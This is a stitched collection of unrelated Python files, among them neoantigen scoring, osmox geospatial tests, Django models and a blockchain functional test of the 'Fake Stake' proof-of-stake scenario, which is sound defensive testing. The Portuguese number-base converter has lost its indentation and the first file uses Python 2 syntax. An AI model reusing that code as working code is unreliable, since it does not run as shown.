        neo_infor = data_neo["Gene"][i]+'_'+data_neo["AA_change"][i]+'_'+data_neo["MT_pep"][i]+'_'+data_neo["WT_pep"][i]
        neoantigen_infor.append(neo_infor)
    data_neo["neoantigen_infor"] = neoantigen_infor
    # Logistic transforms of %EL ranks centred at rank 2 (reward low mutant
    # rank, penalise low wild-type rank).
    f_EL_rank_wt=lambda x:1-(1/(1+math.pow(math.e,5*(float(x)-2))))/2
    f_EL_rank_mt=lambda x:1/(1+math.pow(math.e,5*(float(x)-2)))
    EL_mt_rank_score=data_neo.MT_Binding_EL.apply(f_EL_rank_mt)
    EL_wt_rank_score=data_neo.WT_Binding_EL.apply(f_EL_rank_wt)
    # Bioactive score: product of the per-peptide quality features only.
    bioactive_score=[data_neo.Hydrophobicity_score[i]*data_neo.Recognition_score[i]*data_neo.Self_sequence_similarity[i]*EL_mt_rank_score[i]*EL_wt_rank_score[i] for i in range(len(data_neo.MT_Binding_EL))]
    data_neo["bioactive_score"]=bioactive_score
    data_neo_sortedby_bioactive=data_neo.sort_values(["bioactive_score"],ascending=False)
    data_neo_sortedby_bioactive.to_csv(immunogenicity_bioactive_score_ranking,header=1,index=0,sep='\t')
    # Saturating transform of expression (TPM) via tanh with scale k=1.
    k=1
    f_TPM=lambda x:math.tanh(x/k)
    allele_frequency_score=data_neo.variant_allele_frequency
    netchop_score=data_neo.combined_prediction_score
    # If the `tpm` column is missing, the attribute access below raises
    # AttributeError and the except-branch repeats the scoring without it.
    try:
        tpm_score=data_neo.tpm.apply(f_TPM)
        immuno_effect_score=[tpm_score[i]*allele_frequency_score[i]*netchop_score[i]*data_neo.Hydrophobicity_score[i]*data_neo.Recognition_score[i]*data_neo.Self_sequence_similarity[i]*EL_mt_rank_score[i]*EL_wt_rank_score[i] for i in range(len(data_neo.MT_Binding_EL))]
        data_feature_select=pd.DataFrame()
        data_feature_select["neoantigen_infor"]=neoantigen_infor
        data_feature_select["EL_mt_rank_score"]=EL_mt_rank_score
        data_feature_select["EL_wt_rank_score"]=EL_wt_rank_score
        data_feature_select["tpm_score"]=tpm_score
        #data_feature_select["tpm_normal_score"]=tpm_normal_score
        data_feature_select["allele_frequency_score"]=allele_frequency_score
        data_feature_select["netchop_score"]=netchop_score
        data_feature_select["hydrophobicity_score"]=data_neo.Hydrophobicity_score
        data_feature_select["Recogonition"]=data_neo.Recognition_score
        data_feature_select["Self_sequence_similarity"]=data_neo.Self_sequence_similarity
        data_feature_select["immuno_effect_score"]=immuno_effect_score
        # Feature matrix = all numeric columns (skip the identifier).
        X_neo = data_feature_select.values[:,1:9]
        ####pca on non-standardized data of all 6 feature
        pca = PCA(n_components=2).fit(X_neo)
        X_neo_pca = pca.transform(X_neo)
        #print "PCA result on non-standardized data"
        #print "explained_variance_ratio",pca.explained_variance_ratio_
        #print "explained_variance",pca.explained_variance_
        #print pca.n_components_
        #print pca.components_
        ###plot GMM ellipse
        # Fit a Gaussian mixture with EM using five components
        gmm = mixture.GaussianMixture(n_components=2, covariance_type='full',n_init=5).fit(X_neo_pca)
        plot_results(X_neo_pca, gmm.predict(X_neo_pca), gmm.means_, gmm.covariances_, 0,'Gaussian Mixture',gmm_classification_file)
        #plot_results(X_neo_pca, gmm.predict(X_neo_pca), gmm.means_, gmm.covars_, 0, 'Gaussian Mixture')
        predict_label=gmm.predict(X_neo_pca)
        predict_prob=gmm.predict_proba(X_neo_pca)
        predict_positive_prob=[]
        for i in range(len(predict_prob)):
            pos_prob=predict_prob[i][1]
            predict_positive_prob.append(pos_prob)
        data_feature_select["gmm_label"]=predict_label
        # Relabel so GMM cluster 1 is the higher-scoring ("immunogenic") one.
        data_gmm_filter_1=data_feature_select[data_feature_select["gmm_label"]==1]
        data_gmm_filter_1_scoreAve=data_gmm_filter_1.immuno_effect_score.sum()/len(data_gmm_filter_1.immuno_effect_score)
        data_gmm_filter_0=data_feature_select[data_feature_select["gmm_label"]==0]
        data_gmm_filter_0_scoreAve=data_gmm_filter_0.immuno_effect_score.sum()/len(data_gmm_filter_0.immuno_effect_score)
        if data_gmm_filter_0_scoreAve > data_gmm_filter_1_scoreAve:
            data_gmm_filter_0.gmm_label=1
            data_gmm_filter_1.gmm_label=0
        else:
            pass
        data_labeled=pd.concat([data_gmm_filter_1,data_gmm_filter_0])
        data_label_sorted=data_labeled.sort_values(["immuno_effect_score"],ascending=False)
        data_label_sorted.to_csv(immunogenicity_gmm_all_score_ranking,header=1,index=0,sep='\t')
        data_gmm_positive=data_label_sorted[data_label_sorted["gmm_label"]==1]
        data_gmm_positive.to_csv(immunogenicity_gmm_pos_score_ranking,header=1,index=0,sep='\t')
    except AttributeError,e:
        # No expression data: same scoring/clustering without the tpm factor.
        print e
        immuno_effect_score=[allele_frequency_score[i]*netchop_score[i]*data_neo.Hydrophobicity_score[i]*data_neo.Recognition_score[i]*data_neo.Self_sequence_similarity[i]*EL_mt_rank_score[i]*EL_wt_rank_score[i] for i in range(len(data_neo.MT_Binding_EL))]
        data_feature_select=pd.DataFrame()
        data_feature_select["neoantigen_infor"]=neoantigen_infor
        data_feature_select["EL_mt_rank_score"]=EL_mt_rank_score
        data_feature_select["EL_wt_rank_score"]=EL_wt_rank_score
        data_feature_select["allele_frequency_score"]=allele_frequency_score
        data_feature_select["netchop_score"]=netchop_score
        data_feature_select["hydrophobicity_score"]=data_neo.Hydrophobicity_score
        data_feature_select["Recogonition"]=data_neo.Recognition_score
        data_feature_select["Self_sequence_similarity"]=data_neo.Self_sequence_similarity
        data_feature_select["immuno_effect_score"]=immuno_effect_score
        X_neo = data_feature_select.values[:,1:8]
        ####pca on non-standardized data of all 6 feature
        pca = PCA(n_components=2).fit(X_neo)
        X_neo_pca = pca.transform(X_neo)
        #print "PCA result on non-standardized data"
        #print "explained_variance_ratio",pca.explained_variance_ratio_
        #print "explained_variance",pca.explained_variance_
        #print pca.n_components_
        #print pca.components_
        ###plot GMM ellipse
        # Fit a Gaussian mixture with EM using five components
        gmm = mixture.GaussianMixture(n_components=2, covariance_type='full',n_init=5).fit(X_neo_pca)
        plot_results(X_neo_pca, gmm.predict(X_neo_pca), gmm.means_, gmm.covariances_, 0,'Gaussian Mixture',gmm_classification_file)
        #plot_results(X_neo_pca, gmm.predict(X_neo_pca), gmm.means_, gmm.covars_, 0, 'Gaussian Mixture')
        predict_label=gmm.predict(X_neo_pca)
        predict_prob=gmm.predict_proba(X_neo_pca)
        predict_positive_prob=[]
        for i in range(len(predict_prob)):
            pos_prob=predict_prob[i][1]
            predict_positive_prob.append(pos_prob)
        data_feature_select["gmm_label"]=predict_label
        data_gmm_filter_1=data_feature_select[data_feature_select["gmm_label"]==1]
        data_gmm_filter_1_scoreAve=data_gmm_filter_1.immuno_effect_score.sum()/len(data_gmm_filter_1.immuno_effect_score)
        data_gmm_filter_0=data_feature_select[data_feature_select["gmm_label"]==0]
        data_gmm_filter_0_scoreAve=data_gmm_filter_0.immuno_effect_score.sum()/len(data_gmm_filter_0.immuno_effect_score)
        if data_gmm_filter_0_scoreAve > data_gmm_filter_1_scoreAve:
            data_gmm_filter_0.gmm_label=1
            data_gmm_filter_1.gmm_label=0
        else:
            pass
        data_labeled=pd.concat([data_gmm_filter_1,data_gmm_filter_0])
        data_label_sorted=data_labeled.sort_values(["immuno_effect_score"],ascending=False)
        data_label_sorted.to_csv(immunogenicity_gmm_all_score_ranking,header=1,index=0,sep='\t')
        data_gmm_positive=data_label_sorted[data_label_sorted["gmm_label"]==1]
        data_gmm_positive.to_csv(immunogenicity_gmm_pos_score_ranking,header=1,index=0,sep='\t')
import os
import pytest
from shapely.geometry import Point, Polygon
import geopandas as gp
from osmox import config, build, helpers
# All test inputs live in the fixtures/ directory beside this module.
fixtures_root = os.path.abspath(os.path.join(os.path.dirname(__file__), "fixtures"))


def _fixture(name):
    """Absolute path of a named file inside the fixtures directory."""
    return os.path.join(fixtures_root, name)


toy_osm_path = _fixture("toy.osm")
park_osm_path = _fixture("park.osm")
test_osm_path = _fixture("toy_selection.osm")
test_config_path = _fixture("test_config.json")
leisure_config_path = _fixture("test_config_leisure.json")
@pytest.fixture()
def test_config():
    """Load and return the default test configuration."""
    cfg = config.load(test_config_path)
    return cfg
def test_innit(test_config):
    """An ObjectHandler can be constructed from the default config."""
    handler = build.ObjectHandler(test_config)
    assert handler
@pytest.fixture()
def testHandler(test_config):
    """ObjectHandler built from the default config in WGS84 coordinates."""
    handler = build.ObjectHandler(test_config, crs='epsg:4326')
    return handler
def test_object_assign_points():
    """Points inside the building footprint donate their activity tags; the
    point at (10, 10) lies outside the 10x10 square and must be ignored."""
    footprint = Polygon([(-5, -5), (-5, 5), (5, 5), (5, -5), (-5, -5)])
    building = build.Object(
        idx="XL",
        osm_tags={"building": "yes"},
        activity_tags=[],
        geom=footprint,
    )

    tree = helpers.AutoTree()
    candidate_points = [
        ([("a", "a")], Point((0, 0))),                 # inside
        ([("b", "b")], Point((10, 10))),               # outside the footprint
        ([("c", "c"), ("d", "d")], Point((1, -1))),    # inside, two tags
    ]
    for tag_pairs, geom in candidate_points:
        tree.auto_insert(build.OSMObject(
            idx=0,
            activity_tags=[build.OSMTag(key=k, value=v) for k, v in tag_pairs],
            geom=geom,
        ))

    assert building.assign_points(tree)
    assert building.activity_tags == [
        build.OSMTag(key="a", value="a"),
        build.OSMTag(key="c", value="c"),
        build.OSMTag(key="d", value="d"),
    ]
def test_object_assign_areas():
    """Overlapping candidate areas contribute their activity tags to the
    building; the disjoint area must be ignored."""
    building = build.Object(
        idx="XL",
        osm_tags={"building":"yes"},
        activity_tags=[],
        geom=Polygon([(-5, -5), (-5, 5), (5, 5), (5, -5), (-5, -5)])
    )
    tree = helpers.AutoTree()
    # area with the same footprint as the building
    tree.auto_insert(
        build.OSMObject(
            idx=0,
            activity_tags=[build.OSMTag(key="a", value="a")],
            geom=Polygon([(-5, -5), (-5, 5), (5, 5), (5, -5), (-5, -5)])
        )
    )
    # area disjoint from the building - must not contribute
    tree.auto_insert(
        build.OSMObject(
            idx=0,
            activity_tags=[build.OSMTag(key="b", value="b")],
            geom=Polygon([(10, 10), (10, 25), (25, 25), (25, 10), (10, 10)])
        )
    )
    # large area fully containing the building
    tree.auto_insert(
        build.OSMObject(
            idx=0,
            activity_tags=[
                build.OSMTag(key="c", value="c"),
                build.OSMTag(key="d", value="d")
            ],
            geom=Polygon([(-50, -50), (-50, 50), (50, 50), (50, -50), (-50, -50)])
        )
    )
    # NOTE(review): despite the test's name this calls assign_points(), the
    # same method exercised by test_object_assign_points above - possibly a
    # copy-paste where assign_areas() was intended; confirm against
    # build.Object's API before changing.
    assert building.assign_points(tree)
    assert building.activity_tags == [
        build.OSMTag(key='a', value='a'),
        build.OSMTag(key='c', value='c'),
        build.OSMTag(key='d', value='d')
    ]
def test_load_toy(testHandler):
    """Loading the toy fixture yields the expected counts per element type."""
    testHandler.apply_file(toy_osm_path, locations=True, idx='flex_mem')
    assert len(testHandler.objects) == 5
    assert len(testHandler.points) == 6
    assert len(testHandler.areas) == 3
@pytest.fixture()
def test_leisure_config():
    """Leisure-specific osmox configuration from the fixtures directory."""
    loaded = config.load(leisure_config_path)
    return loaded
@pytest.fixture()
def leisureHandler(test_leisure_config):
    """Non-lazy ObjectHandler in WGS84 built from the leisure config."""
    handler = build.ObjectHandler(test_leisure_config, crs='epsg:4326', lazy=False)
    return handler
def test_leisure_handler(leisureHandler):
    """End-to-end: the park fixture yields at least one 'leisure' activity."""
    leisureHandler.apply_file(park_osm_path, locations=True, idx='flex_mem')
    leisureHandler.assign_tags()
    leisureHandler.assign_activities()
    frame = leisureHandler.geodataframe(single_use=True)
    assert "leisure" in set(frame.activity)
def test_activities_from_area_intersection(testHandler):
    """Only objects intersecting the query area contribute their activities."""
    geometries = [
        Polygon([(0, 0), (0, 10), (10, 10), (10, 0), (0, 0)]),  # inside
        Point((1, 1)),                                          # inside
        Point((100, 100)),                                      # outside
    ]
    for geometry in geometries:
        testHandler.add_object(
            idx=0,
            activity_tags=[["test_tag", "test_value"]],
            osm_tags=[["test", "test"]],
            geom=geometry,
        )
    for obj, activities in zip(testHandler.objects, [["a"], ["b", "c"], ["d"]]):
        obj.activities = activities
    query_area = Polygon([(0, 0), (0, 50), (50, 50), (50, 0), (0, 0)])
    found = testHandler.activities_from_area_intersection(query_area)
    # "d" belongs to the object outside the query area
    assert found == {"a", "b", "c"}
def test_required_activities_in_target(testHandler):
    """Satisfied iff at least one required activity exists inside the target."""
    geometries = [
        Polygon([(0, 0), (0, 10), (10, 10), (10, 0), (0, 0)]),  # inside
        Point((1, 1)),                                          # inside
        Point((100, 100)),                                      # outside
    ]
    for geometry in geometries:
        testHandler.add_object(
            idx=0,
            activity_tags=[["test_tag", "test_value"]],
            osm_tags=[["test", "test"]],
            geom=geometry,
        )
    for obj, activities in zip(testHandler.objects, [["a"], ["b", "c"], ["d"]]):
        obj.activities = activities
    target = Polygon([(0, 0), (0, 50), (50, 50), (50, 0), (0, 0)])
    # "a" is available inside the target
    assert testHandler.required_activities_in_target(
        required_activities=["a"],
        target=target,
    )
    # "b" is inside even though "d" is not - any single match suffices
    assert testHandler.required_activities_in_target(
        required_activities=["b", "d"],
        target=target,
    )
    # "d" only exists outside the target
    assert not testHandler.required_activities_in_target(
        required_activities=["d"],
        target=target,
    )
def test_fill_missing_activities_single_building(testHandler):
    """With spacing wider than the residential area, exactly one new building
    is created to supply the missing activity "d"."""
    geometries = [
        Polygon([(0, 0), (0, 10), (10, 10), (10, 0), (0, 0)]),  # inside area
        Point((1, 1)),                                          # inside area
        Point((110, 110)),                                      # outside area
    ]
    for geometry in geometries:
        testHandler.add_object(
            idx=0,
            activity_tags=[["test_tag", "test_value"]],
            osm_tags=[["test", "test"]],
            geom=geometry,
        )
    testHandler.add_area(
        idx=0,
        activity_tags=[["landuse", "residential"]],
        geom=Polygon([(0, 0), (0, 100), (100, 100), (100, 0), (0, 0)]),
    )
    for obj, activities in zip(testHandler.objects, [["a"], ["b", "c"], ["d"]]):
        obj.activities = activities
    # spacing (101, 101) exceeds the 100x100 area -> only one fill location
    testHandler.fill_missing_activities(
        area_tags=[("landuse", "residential")],
        required_acts=["d"],
        new_tags=[("building", "house")],
        size=(10, 10),
        spacing=(101, 101),
    )
    house = list(testHandler.objects)[-1]
    assert house.idx == "fill_0"
    assert house.geom.equals(Polygon([(0, 0), (0, 10), (10, 10), (10, 0), (0, 0)]))
def test_fill_missing_activities_multiple_buildings(testHandler):
    """With spacing that fits a 2x2 grid in the area, four buildings are added
    ("fill_0" .. "fill_3")."""
    geometries = [
        Polygon([(0, 0), (0, 10), (10, 10), (10, 0), (0, 0)]),  # inside area
        Point((1, 1)),                                          # inside area
        Point((110, 110)),                                      # outside area
    ]
    for geometry in geometries:
        testHandler.add_object(
            idx=0,
            activity_tags=[["test_tag", "test_value"]],
            osm_tags=[["test", "test"]],
            geom=geometry,
        )
    testHandler.add_area(
        idx=0,
        activity_tags=[["landuse", "residential"]],
        geom=Polygon([(0, 0), (0, 100), (100, 100), (100, 0), (0, 0)]),
    )
    for obj, activities in zip(testHandler.objects, [["a"], ["b", "c"], ["d"]]):
        obj.activities = activities
    # spacing (100, 100) fits the 100x100 area twice per axis -> 4 fills
    testHandler.fill_missing_activities(
        area_tags=[("landuse", "residential")],
        required_acts=["d"],
        new_tags=[("building", "house")],
        size=(10, 10),
        spacing=(100, 100),
    )
    filled = list(testHandler.objects)
    first = filled[-4]
    assert first.idx == "fill_0"
    assert first.geom.equals(Polygon([(0, 0), (0, 10), (10, 10), (10, 0), (0, 0)]))
    last = filled[-1]
    assert last.idx == "fill_3"
    assert last.geom.equals(
        Polygon([(100.0, 100.0), (110.0, 100.0), (110.0, 110.0), (100.0, 110.0), (100.0, 100.0)])
    )
def test_extract_multiuse_object_geodataframe(testHandler):
    """A multi-activity object exports as a single row whose activities are
    comma-joined."""
    testHandler.add_object(
        idx=0,
        activity_tags=[['a', 'b']],
        osm_tags=[['a', 'b']],
        geom=Polygon([(-5, -5), (-5, 5), (5, 5), (5, -5), (-5, -5)]),
    )
    target = testHandler.objects.objects[0]
    target.activities = ["a", "b"]
    target.features = {"feature": 0}
    gdf = testHandler.geodataframe()
    assert len(gdf) == 1
    row = gdf.iloc[0].to_dict()
    assert row['activities'] == "a,b"
    # geometry comes back as the point (0, 0) - the centre of the test polygon
    assert row["geometry"] == Point(0, 0)
    assert row["id"] == 0
    assert row["feature"] == 0
def test_extract_single_use_object_geodataframe(testHandler):
    """A multi-activity object exports as one row per activity when
    ``single_use=True``.

    Fix: the two per-row activity checks were bare comparison expressions
    whose results were silently discarded; they are now real assertions.
    """
    testHandler.add_object(
        idx=0,
        activity_tags=[['a', 'b']],
        osm_tags=[['a', 'b']],
        geom=Polygon([(-5, -5), (-5, 5), (5, 5), (5, -5), (-5, -5)])
    )
    testHandler.objects.objects[0].activities = ["a", "b"]
    testHandler.objects.objects[0].features = {"feature": 0}
    gdf = testHandler.geodataframe(single_use=True)
    assert len(gdf) == 2
    assert gdf.iloc[0].to_dict()["activity"] == "a"
    assert gdf.iloc[1].to_dict()["activity"] == "b"
    for i in range(2):
        obj = gdf.iloc[i].to_dict()
        assert obj["geometry"] == Point(0, 0)
        assert obj["id"] == 0
        assert obj["feature"] == 0
|
__title__ = "playground"
__author__ = "murlux"
__copyright__ = "Copyright 2019, " + __author__
__credits__ = (__author__, )
__license__ = "MIT"
__email__ = "murlux@protonmail.com"
from logging import Logger
from typing import Any, Dict
from playground.abstract import Integrator
from playground.util import setup_logger
from playground.warehouse.config import WarehouseConfig
from playground.warehouse.persistence import Warehouse
from playground.warehouse.worker import WarehouseWorker
from playground.warehouse.api import WarehouseAPI
class WarehouseIntegrator(Integrator):
    """
    Main warehouse class, spawns the Warehouse, the WarehouseWorker and the WarehouseAPI.

    These classes are responsible for maintaining and providing up to date datasets.
    """
    logger: Logger = None

    # Critical objects
    warehouse: Warehouse = None  # dataset persistence layer
    worker: WarehouseWorker = None  # performs warehouse upkeep in a thread
    api: WarehouseAPI = None  # serves the warehouse over HTTP

    def __init__(self, config: WarehouseConfig) -> None:
        """Initialize the warehouse's integrator.

        Falls back to hard-coded integrator names when *config* is None,
        otherwise reads ``name``/``module_name`` from the config mapping.
        """
        if config is None:
            super().__init__(
                name="WarehouseIntegrator",
                module_name="warehouse",
            )
        else:
            super().__init__(
                name=config.get("name", None),
                module_name=config.get("module_name", None),
            )
        # the worker and the API share the same Warehouse instance
        self.warehouse = Warehouse()
        self.worker = WarehouseWorker(warehouse=self.warehouse)
        self.api = WarehouseAPI(warehouse=self.warehouse)

    def run(self) -> None:
        """
        Starts the warehouse worker and serves warehouse API.
        """
        # Start the thread that will serve the HTTP Server
        self.api.Start()
        # Start the thread that will perform the Warehouse upkeep
        self.worker.Start()
        # Start the thread that will launch the socket
        #self.socket.Start()
from django.contrib import admin
from .models import Bookmark
# Register your models here.
# Expose Bookmark in the Django admin with the default ModelAdmin options.
admin.site.register(Bookmark)
|
import argparse
import cntk as C
import numpy as np
from azureml.core.run import Run

# Single supported CLI argument: the directory holding the training data.
parser = argparse.ArgumentParser()
parser.add_argument('--data-folder', type=str, dest='data_folder', default='./')
args = parser.parse_args()

# Attach to the current Azure ML run and record library versions and the
# data location as run metrics, so the environment is traceable later.
run = Run.get_context()
run.log('cntk', C.__version__)
run.log('numpy', np.__version__)
run.log('data-folder', args.data_folder)
#!/usr/bin/env python3
# Copyright (c) 2019 The NRDI developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Covers the scenario of a valid PoS block where the coinstake input prevout is spent on main chain,
but not on the fork branch. These blocks must be accepted.
'''
from time import sleep
from fake_stake.base_test import NRDI_FakeStakeTest
class PoSFakeStakeAccepted(NRDI_FakeStakeTest):
    """Valid PoS blocks whose coinstake prevout is spent on main chain but
    not on the fork branch must be accepted.

    Fixes: misspelled local constant ``INITAL_MINED_BLOCKS`` renamed to
    ``INITIAL_MINED_BLOCKS`` (local to run_test, no external callers), and
    the double-negated ``if not len(err_msgs) == 0`` replaced with the
    idiomatic truthiness check.
    """

    def run_test(self):
        """Mine a chain, spend the collected coins on main chain, then spam
        fork blocks staking those (fork-unspent) coins and expect acceptance."""
        self.description = "Covers the scenario of a valid PoS block where the coinstake input prevout is spent on main chain, but not on the fork branch. These blocks must be accepted."
        self.init_test()
        INITIAL_MINED_BLOCKS = 200  # first mined blocks (rewards collected to spend)
        FORK_DEPTH = 50             # blocks after INITIAL_MINED_BLOCKS before the coins are spent
        MORE_MINED_BLOCKS = 10      # blocks after spending of the collected coins
        self.NUM_BLOCKS = 3         # number of spammed blocks

        # 1) Starting mining blocks
        self.log.info("Mining %d blocks.." % INITIAL_MINED_BLOCKS)
        self.node.generate(INITIAL_MINED_BLOCKS)

        # 2) Collect the possible prevouts
        self.log.info("Collecting all unspent coins which we generated from mining...")
        staking_utxo_list = self.node.listunspent()
        sleep(2)

        # 3) Mine more blocks so the fork point lies below the spend height
        self.log.info("Mining %d more blocks.." % (FORK_DEPTH + 1))
        self.node.generate(FORK_DEPTH + 1)
        sleep(2)

        # 4) Spend the coins collected in 2 on the main chain
        self.log.info("Spending the coins mined in the first %d blocks..." % INITIAL_MINED_BLOCKS)
        tx_hashes = self.spend_utxos(staking_utxo_list)
        self.log.info("Spent %d transactions" % len(tx_hashes))
        sleep(2)

        # 5) Mine more blocks so the spends are included in the chain
        self.log.info("Mining %d more blocks to include the TXs in chain..." % MORE_MINED_BLOCKS)
        self.node.generate(MORE_MINED_BLOCKS)
        sleep(2)

        # 6) Create "Fake Stake" blocks on the fork and send them; with
        #    fMustPass=True every rejection is collected as an error message.
        self.log.info("Creating Fake stake blocks")
        err_msgs = self.test_spam("Fork", staking_utxo_list, fRandomHeight=True,
                                  randomRange=FORK_DEPTH,
                                  randomRange2=MORE_MINED_BLOCKS - 2,
                                  fMustPass=True)
        if err_msgs:
            self.log.error("result: " + " | ".join(err_msgs))
            raise AssertionError("TEST FAILED")
        self.log.info("%s PASSED" % self.__class__.__name__)
# Run the functional test directly when executed as a script.
if __name__ == '__main__':
    PoSFakeStakeAccepted().main()
|
import m.common as common
class StatementBase(common.HelpClass):
    """Base class for statements; dump() is a no-op hook for subclasses."""

    def __init__(self):
        pass

    def dump(self, fh):
        """Write this statement to *fh*; intentionally empty in the base."""
        pass

    def dumplog(self, log, context=""):
        """Log this statement's class name, prefixed with *context*."""
        log.info("%sStatement %s", context, self.__class__.__name__)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-05-03 11:51
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema for the dataschema_manager app.

    Creates DataSchema (a named collection of fields), DataSchemaConstraints
    (validation rules) and DataSchemaField (a typed column description).
    Auto-generated by Django 1.11 - prefer a new migration over editing this.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='DataSchema',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255)),
            ],
        ),
        migrations.CreateModel(
            name='DataSchemaConstraints',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('unique', models.BooleanField(default=False, verbose_name='Values in this row have to be unique')),
                ('format', models.CharField(blank=True, max_length=100, verbose_name='Define a format (only for Date/Time/DateTime)')),
                ('minimum', models.CharField(blank=True, max_length=100, verbose_name='(optional) Define a minimum value (only for Number/Date/Time/DateTime) ')),
                ('maximum', models.CharField(blank=True, max_length=100, verbose_name='(optional) Define a maximum value')),
                ('required', models.BooleanField(default=False, verbose_name='Field is required')),
                ('min_length', models.IntegerField(null=True)),
                ('max_length', models.IntegerField(null=True)),
            ],
        ),
        migrations.CreateModel(
            name='DataSchemaField',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100, verbose_name='Name of row')),
                ('datatype', models.CharField(choices=[('string', 'String'), ('number', 'Number'), ('date', 'Date'), ('time', 'Time'), ('datetime', 'DateTime'), ('year', 'Year'), ('yearmonth', 'Year Month'), ('boolean', 'Boolean'), ('object', 'Object'), ('geopoint', 'GeoPoint'), ('array', 'Array'), ('duration', 'Duration'), ('any', 'Any')], max_length=100)),
                ('primary_key', models.BooleanField(default=False, verbose_name='Field is a primary key')),
                ('title', models.CharField(blank=True, max_length=100, verbose_name='Title of field')),
                ('description', models.TextField(blank=True, verbose_name='Description of the contents of the field')),
                ('constraints', models.ManyToManyField(to='dataschema_manager.DataSchemaConstraints')),
            ],
        ),
        # Added after DataSchemaField exists so the M2M target is resolvable.
        migrations.AddField(
            model_name='dataschema',
            name='fields',
            field=models.ManyToManyField(to='dataschema_manager.DataSchemaField'),
        ),
    ]
|
from pyopenproject.api_connection.exceptions.request_exception import RequestError
from pyopenproject.api_connection.requests.get_request import GetRequest
from pyopenproject.business.exception.business_error import BusinessError
from pyopenproject.business.services.command.find_list_command import FindListCommand
from pyopenproject.business.services.command.time_entry.time_entry_command import TimeEntryCommand
from pyopenproject.business.util.filters import Filters
from pyopenproject.business.util.url import URL
from pyopenproject.business.util.url_parameter import URLParameter
from pyopenproject.model.time_entry import TimeEntry
class FindAll(TimeEntryCommand):
    """Command that fetches every time entry matching the given filters,
    sorted as requested."""

    def __init__(self, connection, filters, sort_by):
        """Keep the filters and the sortBy expression for execute()."""
        super().__init__(connection)
        self.filters = filters
        self.sort_by = sort_by

    def execute(self):
        """Run the GET request and return the matching TimeEntry list.

        Raises:
            BusinessError: wraps any RequestError from the transport layer.
        """
        try:
            url_parameters = [
                Filters(self.filters),
                URLParameter("sortBy", self.sort_by),
            ]
            endpoint = str(URL(f"{self.CONTEXT}", url_parameters))
            request = GetRequest(self.connection, endpoint)
            return FindListCommand(self.connection, request, TimeEntry).execute()
        except RequestError as re:
            raise BusinessError("Error finding all time entries") from re
|
"""
Programa que leia um numero inteiro qualquer e peça para o usuário escolher qual será a base de conversão
1 - para binário
2 - para octal
3 - para hexadecimal
"""
num = int(input('Digite um numero inteiro: '))
print('''
1 - Converter para BINÁRIO
2 - Converter para OCTAL
3 - Converter para HEXADECIMAL
''')
opcao = int(input('Informe a opção desejada '))
if opcao == 1:
print(f'O número {num} convertido para BINÁRIO é {bin(num)[2:]}')
elif opcao == 2:
print(f'O número {num} convertido para OCTAL é {oct(num)[2:]}')
elif opcao == 3:
print(f'O número {num} convertido para HEXADECIMAL é {hex(num)[2:]}')
else:
print('Opção inválida. Tente novamente')
|
# Read board sizes until 0; for each n, print an n x n grid where every cell
# holds the 1-based index of the concentric ring it belongs to.
while True:
    n = int(input())
    if n == 0:
        break
    # n x n grid of zeros
    matriz = [[0] * n for _ in range(n)]
    cima, esquerda = 0, 0
    baixo = direita = n - 1
    # number of rings to paint (float comparison kept as in the original)
    meio = n / 2 if n % 2 == 0 else (n + 1) / 2
    resultado = 1
    while resultado <= meio:
        # top and bottom edges of the current ring (inclusive of corners)
        for col in range(esquerda, direita + 1):
            matriz[cima][col] = resultado
            matriz[baixo][col] = resultado
        # left and right edges (corners already painted above)
        for row in range(cima + 1, baixo):
            matriz[row][esquerda] = resultado
            matriz[row][direita] = resultado
        # shrink the window inward and move to the next ring
        resultado += 1
        cima += 1
        baixo -= 1
        esquerda += 1
        direita -= 1
    # first column gets a single leading space, the rest 4-wide fields
    for linha in range(len(matriz)):
        for coluna in range(len(matriz)):
            if coluna == 0:
                print(f" {matriz[linha][coluna]}", end="")
            else:
                print(f"{matriz[linha][coluna]:4d}", end="")
        print()
    print()
|
"""Loads a ggcm log file
Parses the view info """
from __future__ import print_function
import itertools
import re
import numpy as np
from viscid.readers import vfile
# FIXME: This lookup table is based on an enum in ggcm_mhd.h, ie, the numerical
# values (index in this list) could change in the future - but libmrc
# only writes out the integer value for mhd->ggcm_mhd_fld->mhd_type
# into the log file, so a guess is better than nothing...
MHD_TYPES = ["MT_PRIMITIVE",
# the following have B staggered the openggcm way: [-1..mx[
"MT_SEMI_CONSERVATIVE_GGCM",
# the following have B staggered the "normal" way: [0..mx]
"MT_SEMI_CONSERVATIVE",
"MT_FULLY_CONSERVATIVE",
# cell-centered fully conservative MHD
"MT_FULLY_CONSERVATIVE_CC",
# the multi-moment schemes are cell-centered for all quantities
"MT_GKEYLL"]
class GGCMLogFile(vfile.VFile):  # pylint: disable=W0223
    """Libmrc log file reader

    This class looks at the mrc_view info before the run starts
    to gather info about libmrc runtime parameters.

    Attributes:
        watched_classes (list): list of libmrc classes whose parameters
            will be loaded
    """
    _detector = None
    _grid_type = None

    # only parameters belonging to these libmrc classes are collected
    watched_classes = ["ggcm_mhd",
                       "mrc_domain",
                       "mrc_crds",
                       "ggcm_mhd_ic",
                       "ggcm_dipole",
                       "ggcm_mhd_step",
                       "ggcm_mhd_fld"]

    # dict mapping "<class>_<param>" -> parsed value; filled by _parse()
    info = None

    def _parse(self):
        """Scan the log's mrc_view section and populate ``self.info``."""
        _info = {}
        # `armed` is False outside a watched class's section, or holds the
        # class name while that class's "parameter | value" lines are read
        armed = False
        with open(self.fname, 'r') as f:
            # find end of view
            def is_timestep(s):
                # the view ends at the first timestep line ("cp=..."/"step=...")
                return not s.strip().startswith(('cp=', 'step='))
            lines_iter = itertools.takewhile(is_timestep, f)
            for line in lines_iter:
                line = line.strip()
                if armed:
                    try:
                        key, val = self._parse_param(line)
                        _info["{0}_{1}".format(armed, key)] = val
                    except ValueError:
                        # this is expected for lines that look like
                        # "-------+------ type -- ???"
                        # as well as blank lines that mark the end of a
                        # section
                        clstype = re.match(r"-+\+-+ type -- (\w+)", line)
                        if clstype:
